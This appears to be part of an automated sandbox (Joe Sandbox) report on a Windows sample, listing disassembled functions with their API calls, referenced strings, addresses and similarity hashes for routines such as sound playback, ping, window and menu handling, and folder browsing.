Line %d:, xrefs: 0062F818
%s (%d) : ==> %s.: %s %s, xrefs: 0062F7F7
Line %d (File "%s"):, xrefs: 0062F833
Error: , xrefs: 0062F85B
., xrefs: 0062F873

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: fd0978abbdb6b829c96655bf94bfed3b582ae416a1da0e00cc562e60ebb9a3f4
Instruction ID: 94e91c38b9155a77b6548d4924118442b5f2eaa4b947ab347e380758b0d9f8fc
Opcode Fuzzy Hash: fd0978abbdb6b829c96655bf94bfed3b582ae416a1da0e00cc562e60ebb9a3f4
Instruction Fuzzy Hash: 53216D3295061EAFCF21EF94CC1AEEE7B3ABF18300F040466B515661A1EA759A18DB50

Function 006352C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 005D7BCC: _memmove.LIBCMT ref: 005D7C06

Part of subcall function 005D7924: _memmove.LIBCMT ref: 005D79AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00635330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00635346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00635357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00635369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0063537A

Strings

play PlayMe wait, xrefs: 00635364
play PlayMe, xrefs: 00635375
status PlayMe mode, xrefs: 0063532B
alias PlayMe, xrefs: 00635309
open , xrefs: 006352DF
close PlayMe, xrefs: 00635341, 0063536E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 6c7b1b1b1dd38c8b204a2bef02a0cf0893477ba635478762a36a5958503e8e83
Instruction ID: 0242601d88b75fdb1c8d24fba5cd5c1d19f2cf5b6ac74d9a7b87f2a956e8354d
Opcode Fuzzy Hash: 6c7b1b1b1dd38c8b204a2bef02a0cf0893477ba635478762a36a5958503e8e83
Instruction Fuzzy Hash: 31114C21A9012E6DE720B765CC5ADFF6A7DEBD9B40F90052AB402A31D1FEA00945C6A0

Function 006346B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 006346D2
gethostname.WSOCK32(?,00000100), ref: 006346EC
gethostbyname.WSOCK32(?), ref: 006346F9
_wcscpy.LIBCMT ref: 00634721
_memmove.LIBCMT ref: 00634734
inet_ntoa.WSOCK32(?), ref: 0063473F
_strcat.LIBCMT ref: 0063474D
_wcscpy.LIBCMT ref: 00634764
WSACleanup.WSOCK32 ref: 00634772
_wcscpy.LIBCMT ref: 00634780

Strings

0.0.0.0, xrefs: 0063471B

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 6ed287be078700b2fa9251ce5c6039e883c85d923442247c9cc00d14fd64ef3e
Instruction ID: 594c4040720233c715a8c6b231523e5d59837f66c29e5c0263297184eb917787
Opcode Fuzzy Hash: 6ed287be078700b2fa9251ce5c6039e883c85d923442247c9cc00d14fd64ef3e
Instruction Fuzzy Hash: 3511E7315042196FCB14AB309C4AEEABBBDEF42712F0401B6F545D6191FF7599818A90

Function 00634F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00634F7A

Part of subcall function 005F049F: timeGetTime.WINMM(?,76C1B400,005E0E7B), ref: 005F04A3

Sleep.KERNEL32(0000000A), ref: 00634FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00634FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00634FEC
SetActiveWindow.USER32 ref: 0063500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00635019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00635038
Sleep.KERNEL32(000000FA), ref: 00635043
IsWindow.USER32 ref: 0063504F
EndDialog.USER32(00000000), ref: 00635060

Strings

BUTTON, xrefs: 00634FDE

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 50905d8d350ad42967f0193de2a9258b2ce091187579eadcb99be798983d77b8
Instruction ID: 93e9681d968ae63741ae2980ff265e4201cf40e9e19fae4757c6db5461f8a3c1
Opcode Fuzzy Hash: 50905d8d350ad42967f0193de2a9258b2ce091187579eadcb99be798983d77b8
Instruction Fuzzy Hash: 8D219670204705AFE7119F20EC89A663BAFEB46746F0A3029F102826B1DB729D5087F1

Function 0063D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 005D9837: __itow.LIBCMT ref: 005D9862
Part of subcall function 005D9837: __swprintf.LIBCMT ref: 005D98AC

CoInitialize.OLE32(00000000), ref: 0063D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0063D67D
SHGetDesktopFolder.SHELL32(?), ref: 0063D691
CoCreateInstance.OLE32(00662D7C,00000000,00000001,00688C1C,?), ref: 0063D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0063D74C
CoTaskMemFree.OLE32(?,?), ref: 0063D7A4
_memset.LIBCMT ref: 0063D7E1
SHBrowseForFolderW.SHELL32(?), ref: 0063D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0063D840
CoTaskMemFree.OLE32(00000000), ref: 0063D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0063D87E
CoUninitialize.OLE32(00000001,00000000), ref: 0063D880

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: a83febf4d67ba30df112a46386bbb58c9e3c95f82925ecb1b7cf3259f2a9b6b8
Instruction ID: c2ff00a46fa89268af75a4efe310e28dd422f8c2e30f7629bc137eaa0880a20c
Opcode Fuzzy Hash: a83febf4d67ba30df112a46386bbb58c9e3c95f82925ecb1b7cf3259f2a9b6b8
Instruction Fuzzy Hash: 46B1EB75A00109AFDB14DFA8D889DAEBBBAFF49314F148469F909EB251DB30ED41CB50

Function 0062C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0062C283
GetWindowRect.USER32(00000000,?), ref: 0062C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0062C2F3
GetDlgItem.USER32(?,00000002), ref: 0062C2FE
GetWindowRect.USER32(00000000,?), ref: 0062C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0062C364
GetDlgItem.USER32(?,000003E9), ref: 0062C372
GetWindowRect.USER32(00000000,?), ref: 0062C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0062C3C6
GetDlgItem.USER32(?,000003EA), ref: 0062C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0062C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0062C3FE

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 0c5eec5da70b97e1e0dc101ef25fe5efb9b69f6814d6b759ea1458642b965532
Instruction ID: 46d1910b94d47ca8d9a9896406fcf29d2189de82811bdbbbbcc54afb74cf973d
Opcode Fuzzy Hash: 0c5eec5da70b97e1e0dc101ef25fe5efb9b69f6814d6b759ea1458642b965532
Instruction Fuzzy Hash: 5E514071B00705AFDB18CFA9DD99AAEBBBAEB88711F14852DF515D7290DB709D008B10

Function 0063A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0065F910), ref: 0063A90B
GetDriveTypeW.KERNEL32(00000061,006889A0,00000061), ref: 0063A9D5
_wcscpy.LIBCMT ref: 0063A9FF

Strings

removable, xrefs: 0063A93D
unknown, xrefs: 0063A996
all, xrefs: 0063A911
ramdisk, xrefs: 0063A97F
fixed, xrefs: 0063A953
network, xrefs: 0063A969
cdrom, xrefs: 0063A927

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 88940eca9f4bf87dbc02b6d8ea606c7204b5bfe24529de9c23d41cedb53afd21
Instruction ID: 3793358bbc49655f3919ec6fc0e61e9b8ea920ea8b99d647967301c2c56e5d56
Opcode Fuzzy Hash: 88940eca9f4bf87dbc02b6d8ea606c7204b5bfe24529de9c23d41cedb53afd21
Instruction Fuzzy Hash: 7D519E311183029FC710EF58C996AAEBBA6FF84300F54492EF5D5972E2DB319909DB93

Function 00658645 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006586FF

Strings

P[, xrefs: 00658681

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: InvalidateRect
String ID: P[
API String ID: 634782764-2517523118
Opcode ID: e2337c81b3a5720f7f927cc1cd03d6eb7f2bc9db7255c4291a913a7148220aaf
Instruction ID: d06a6cf608ef99c6ad46778bb55d1bd1e2d7225b73a6f204d46fa0ae1302a8c9
Opcode Fuzzy Hash: e2337c81b3a5720f7f927cc1cd03d6eb7f2bc9db7255c4291a913a7148220aaf
Instruction Fuzzy Hash: F1519030500244BEEB209B29CC89FAD7BA7FB09716F604116FD51F7AA1CF71A988CB51

Function 005D9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 005D9862
__swprintf.LIBCMT ref: 005D98AC
__i64tow.LIBCMT ref: 0060F5E6

Strings

False, xrefs: 0060F5AE
%.15g, xrefs: 005D98A6
True, xrefs: 0060F5A7
0x%p, xrefs: 0060F5C8

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 959383e51d09fe10c908e0a58df7750d5e069930501ca2fa7e8e81ee90064716
Instruction ID: 67a44ae8c2f903ec86d325a3e2b4c3da447504c37f609afb9c8241b83c1b99d1
Opcode Fuzzy Hash: 959383e51d09fe10c908e0a58df7750d5e069930501ca2fa7e8e81ee90064716
Instruction Fuzzy Hash: AB41E77150020A9EEB39EF38DC46A767BEAFF45700F20486FE549D7392EA3599419710

Function 006574BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0065755E
CreateCompatibleDC.GDI32(00000000), ref: 00657565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00657578
SelectObject.GDI32(00000000,00000000), ref: 00657580
GetPixel.GDI32(00000000,00000000,00000000), ref: 0065758B
DeleteDC.GDI32(00000000), ref: 00657594
GetWindowLongW.USER32(?,000000EC), ref: 0065759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 006575B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 006575BE

Strings

static, xrefs: 006574F6

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: fabf21b86d031d492ed086a3a9a9eb221eb426b67037fd010909af3113e26e40
Instruction ID: b49eab4559107bcf0deaff7fd4ddd0ea53d5b33ba519480ceae8c64d58a85386
Opcode Fuzzy Hash: fabf21b86d031d492ed086a3a9a9eb221eb426b67037fd010909af3113e26e40
Instruction Fuzzy Hash: 5D317E72104215BBDF229F64EC08FDB3BAEFF09322F111225FA15961A0DB71D825DBA4

Function 005F6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005F6E3E

Part of subcall function 005F8B28: __getptd_noexit.LIBCMT ref: 005F8B28

__gmtime64_s.LIBCMT ref: 005F6ED7
__gmtime64_s.LIBCMT ref: 005F6F0D
__gmtime64_s.LIBCMT ref: 005F6F2A
__allrem.LIBCMT ref: 005F6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005F6F9C
__allrem.LIBCMT ref: 005F6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005F6FD1
__allrem.LIBCMT ref: 005F6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005F7006
__invoke_watson.LIBCMT ref: 005F7077

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 302313b7ec9a6259c4764b369e16038cf286fa5d4cbaea6b9d8f1d83aa1d90d1
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 0871E476A4071BABD714AE68DC45B7BBBADBF04324F144629F714D72C1EB78E9008B90

Function 00632527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00632542
GetMenuItemInfoW.USER32(00695890,000000FF,00000000,00000030), ref: 006325A3
SetMenuItemInfoW.USER32(00695890,00000004,00000000,00000030), ref: 006325D9
Sleep.KERNEL32(000001F4), ref: 006325EB
GetMenuItemCount.USER32(?), ref: 0063262F
GetMenuItemID.USER32(?,00000000), ref: 0063264B
GetMenuItemID.USER32(?,-00000001), ref: 00632675
GetMenuItemID.USER32(?,?), ref: 006326BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00632700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00632714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00632735

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 26390ee784933e567e84a47e79ded6d0c384fbf1a35009ed107e990f6718b30c
Instruction ID: 683598c1251876a54b85c47c7d85170c1c02575ee413b8e5fa9cc9c790141701
Opcode Fuzzy Hash: 26390ee784933e567e84a47e79ded6d0c384fbf1a35009ed107e990f6718b30c
Instruction Fuzzy Hash: A5618DB090024AAFDB21CF64DCA9DFE7BBAFF46304F140059E942A7251D731AE05DBA1

Function 00626B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00626BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00626C18
VariantInit.OLEAUT32(?), ref: 00626C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00626C4A
VariantCopy.OLEAUT32(?,?), ref: 00626C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00626CB1
VariantClear.OLEAUT32(?), ref: 00626CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00626CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00626CDC
VariantClear.OLEAUT32(?), ref: 00626CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00626CF9

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: d6cd8aacf5487cd06d16434d3749f60078962018fda406eb15e7dbaed5ca9645
Instruction ID: 8b5f216638a887aa187e3305a1b92619c5fe8bfbf6b5c310af953b9c06b420c4
Opcode Fuzzy Hash: d6cd8aacf5487cd06d16434d3749f60078962018fda406eb15e7dbaed5ca9645
Instruction Fuzzy Hash: F1413075A002299FCF10EF68D8489AEBBBAFF48355F008069F955E7361CB31A945CF90

Function 0065D43E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005D2612: GetWindowLongW.USER32(?,000000EB), ref: 005D2623

GetSystemMetrics.USER32(0000000F), ref: 0065D47C
GetSystemMetrics.USER32(0000000F), ref: 0065D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0065D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0065D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0065D716
ShowWindow.USER32(00000003,00000000), ref: 0065D735
InvalidateRect.USER32(?,00000000,00000001), ref: 0065D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 0065D77D

Strings

P[, xrefs: 0065D4E9

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID: P[
API String ID: 1211466189-2517523118
Opcode ID: f7c264e41d2f5234f8232f99c239930602cfdeeac2a670a92e0dfd3ac997ad59
Instruction ID: bc36b03adb4eaf03630ab0eb8f996493b6d21dbc8b5b4fae878367347c5d80b5
Opcode Fuzzy Hash: f7c264e41d2f5234f8232f99c239930602cfdeeac2a670a92e0dfd3ac997ad59
Instruction Fuzzy Hash: B2B16A75600225EBDF24CF68C9857ED7BB2FF08712F088169EC489F295E734A959CB90

Function 00645732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00645793
inet_addr.WSOCK32(?,?,?), ref: 006457D8
gethostbyname.WSOCK32(?), ref: 006457E4
IcmpCreateFile.IPHLPAPI ref: 006457F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00645862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00645878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 006458ED
WSACleanup.WSOCK32 ref: 006458F3

Strings

Ping, xrefs: 00645816

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

